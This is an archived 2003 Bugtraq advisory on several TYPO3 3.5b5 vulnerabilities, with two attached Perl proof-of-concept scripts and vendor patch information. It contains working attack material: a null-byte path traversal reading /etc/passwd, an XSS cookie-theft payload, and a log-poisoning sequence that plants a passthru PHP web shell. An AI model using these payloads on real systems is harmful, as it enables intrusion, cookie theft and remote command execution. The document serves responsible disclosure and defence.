linux, säkerhet

92200 2003-02-28  18:49  /221 rader/ Martin Eiszner <martin@websec.org>
Importerad: 2003-02-28  18:49  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <3729>
Ärende: typo3 issues
------------------------------------------------------------

hola, ...


2002@WebSec.org/Martin Eiszner

=====================
Security REPORT TYPO3
=====================

this document: http://www.websec.org/adv/typo3.html

Product: Typo3 (Version 3.5b5 / Earlier versions are possibly vulnerable too)

Vendor: Typo3 (http://www.typo3.com)
Vendor-Status: kasper@typo3.com informed / new version OUT
Vendor-Patch: http://typo3.org/1331.0.html

Local: NO
Remote: YES

Vulnerabilities:
-path-disclosure
-proof of file-existense
-arbitrary file retrieval
-arbitrary command execution
-CrossSiteScripting / privilege escalation / cookie-theft
-install/config files and scripts within webroot

Severity: MEDIUM to HIGH

Tested Plattforms: Linux / Slackware i686 / Apache 1.3.23 / PHP 4.1.2



============
Introduction
============

Taken from http://www.typo3.com

TYPO3 is a free Open Source content management system for enterprise
purposes on the web and in intranets. It offers full flexibility and
extendability while featuring an accomplished set of ready-made
interfaces, functions and modules.


=====================
Vulnerability Details
=====================


0) CLIENT-SIDE DATA-OBFUSCATION

form-fields are obfuscated using client-side java-script routines.
after the fields are joined a java-script creates MD5-hashes and
submits the form.

examples: index.php (account-data), showpic.php(name-checksum)

attached perl-scripts (typo.pl/showpic.pl) demonstrate how to
circumvent this protection.


1) PATH-DISCLOSURE

several test-, class- and library-scripts can be found within webroot.
some of them can be forced to produce runtime errors and output their
physical path.

example: /fileadmin/include_test.php


2) PROOF OF FILE-EXISTENCE

"showpic.php" and "thumbs.php" allow an attacker to check the
existense of arbitrary files.

combined with file-enumeration methods it is possible to reconstruct
parts of the directory- and filesystem - structure.

example on howto check for existing files with attached perl-script
"showpic.pl":
---*---
sh> showpic.pl localhost '../../../../../../../../../../etc/hosts'
../../../../../../../../../../etc/hosts exists
---*---


3) CROSS SITE SCRIPTING / COOKIE-THEFT

all system and login-errors are saved in the typo3-database.
administrators can view all the erroneous data.

since this data is not being checked for XSS-content it is possible
to include client-side script(java-script)-tags in these entries.

every time the admins view their logs these scripts will be run on
the admins web-browser which leads to a typical XSS-bug.

thus making it possible to steal the admins-cookies or let him open a
new user-account without his knowledge.


example with the attached "typo.pl" - perlscript:

---*---
sh> typo.pl localhost '><script>alert(document.cookie)</script><:aaa'
---*---

viewing the logfiles will execute the script.


4) ARBITRARY FILE-RETRIEVAL

the "dev/translations.php" - script does not check the
ONLY-parameter for malicious values.

a relative path combined with a Nullbyte lead to the inclusion of the
given file.

example http-request:
---*--- GET
http://host/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00
---*---


5) ARBITRARY COMMAND EXECUTION

extends vulnerability number 4):

if the included file contains php-source code it will be executed.
thus allowing an attacker to execute operating-system commands and
at long sight escalate his privileges.

example:
---*---

a file for placing our malicious php-source is needed.  if there is
no file we have write-access we still can use the websevers-logfiles.

the following http-request:
---cut--- http://localhost/<%3f %60echo
%27<%3fpassthru(%5c%24c)%3f>%27 >> ./x.php%60 %3f>
---cut---

creates this entry:

---cut--- [Tue Jan 14 19:42:53 2003] [error] [client 127.0.0.1] File
does not exist: /apachepath/apache/htdocs/<? `echo '<?passthru(\$c
)?>' >> ./x.php` ?>
---cut---

in a typicall apache - error_log file.

using the method discussed under 4) the following http-request:

---cut---
http://localhost/typo3/typo3/dev/translations.php?ONLY=relative_apache_path/apache/logs/error_log%00'
---cut---

will include the apach error_log in our output and execute our
php-commands.  as a result we will find x.php in our "/dev" directory.

x.php:
---cut---
<?passthru($c)?>
---cut---

---*---


6) SCRIPTS AND DIRECTORIES IN WEBROOT

a couple of scripts, libraries, files and directories can be found
within typo3s webroot.

"/install" is improper protected and vulnerable to brute-force
attacks.  "/fileadmin" directory reveals log-files and demo-scripts
"/typo3conf" directory contains the localconf.php,database.sql and
other sensitive files


=======
Remarks
=======

the serious vulnerabilities rely on the "/dev" (developer?) -
directory.  scripts within this directory can be found in many/most
production-environments!


====================
Recommended Hotfixes
====================
overall) install the new Version !

or

1) remove "/install" directory 2) remove "/dev" directory 3) Choose
strong administrator-passwords 4) showpic.php and thumbs.php must be
patched.  5) remove all demo-directories and protect "/fileadmin" and
"/typo3conf"



EOF Martin Eiszner / @2002WebSec.org



=======
Contact
=======

-- 
WebSec.org / Martin Eiszner
Gurkgasse 49/Top14
1140 Vienna
Austria / EUROPE

mei@websec.org
http://www.websec.org
tel: 0043 699 121772 37
(92200) /Martin Eiszner <martin@websec.org>/(Ombruten)
Bilaga (application/octet-stream) i text 92201
Bilaga (application/octet-stream) i text 92202
92201 2003-02-28  18:49  /48 rader/ Martin Eiszner <martin@websec.org>
Bilagans filnamn: "typo.pl"
Importerad: 2003-02-28  18:49  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <3730>
Bilaga (text/plain) till text 92200
Ärende: Bilaga (typo.pl) till: typo3 issues
------------------------------------------------------------
#!/usr/bin/perl
use strict;
use Getopt::Std;
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Response;
use HTTP::Headers;
use HTML::Form;
use Digest::MD5 qw(md5_hex);

my ($thehost,$account) = @ARGV;
my ($uid,$pwd) = split(/:/,$account,2);
my $pass = $pwd;
print "\nchecking $thehost | $uid | $pwd\n";
$pwd = md5_hex("$pwd");

my $content = "";
my $userident = "";

my $hds = HTTP::Headers->new;
my $ua = new LWP::UserAgent();
push @{ $ua->requests_redirectable }, 'POST';
$ua->agent("Opera 6.0");

my $uri = "http://".$thehost."/typo3/typo3/index.php";
my $req = HTTP::Request->new("GET", $uri, $hds, $content);
my $res = $ua->request($req);
my $res_heads = $res->headers;

my $cookie = $res_heads->header("Set-Cookie");
my $form = HTML::Form->parse($res->content, "$uri");
my $challenge = $form->value("challenge");
$userident = md5_hex("$uid:$pwd:$challenge");

$hds->header('Cookie' => "$cookie"); $hds->header('Content-Type' =>
"application/x-www-form-urlencoded"); $content =
"username=$uid&p_field=&userident=$userident&challenge=$challenge&redirect_url=alt_main.php";
$content .= "&loginRefresh=&login_status=login&interface=alternative";

my $req = HTTP::Request->new("POST", $uri, $hds, $content);
my $res = $ua->request($req);

$res_heads = $res->headers;
$cookie = $res_heads->header("Set-Cookie");

print "\nRescode:".$res->code()."\n".$res_heads->as_string()."\n\n";
#print "\n".$res_heads->as_string()."\n\n".$res->content()."\n\n";
(92201) /Martin Eiszner <martin@websec.org>/(Ombruten)
92202 2003-02-28  18:49  /14 rader/ Martin Eiszner <martin@websec.org>
Bilagans filnamn: "showpic.pl"
Importerad: 2003-02-28  18:49  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <3731>
Bilaga (text/plain) till text 92200
Ärende: Bilaga (showpic.pl) till: typo3 issues
------------------------------------------------------------
#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Response;
use Digest::MD5 qw(md5_hex);
($ho,$fi) = @ARGV;
$md5 = md5_hex("$fi||||");
$ua = new LWP::UserAgent(); $ua->agent("Opera 6.0");
$uri = "http://".$ho."/typo3/showpic.php?file=$fi&md5=$md5";
$req = HTTP::Request->new("GET",$uri);
$res = $ua->request($req);
if ($res->content !~ /was not found/ && $res->content !~ /No valid/) {print "\n$fi exists\n";}
else {print "\n$fi not found\n";}
(92202) /Martin Eiszner <martin@websec.org>/--------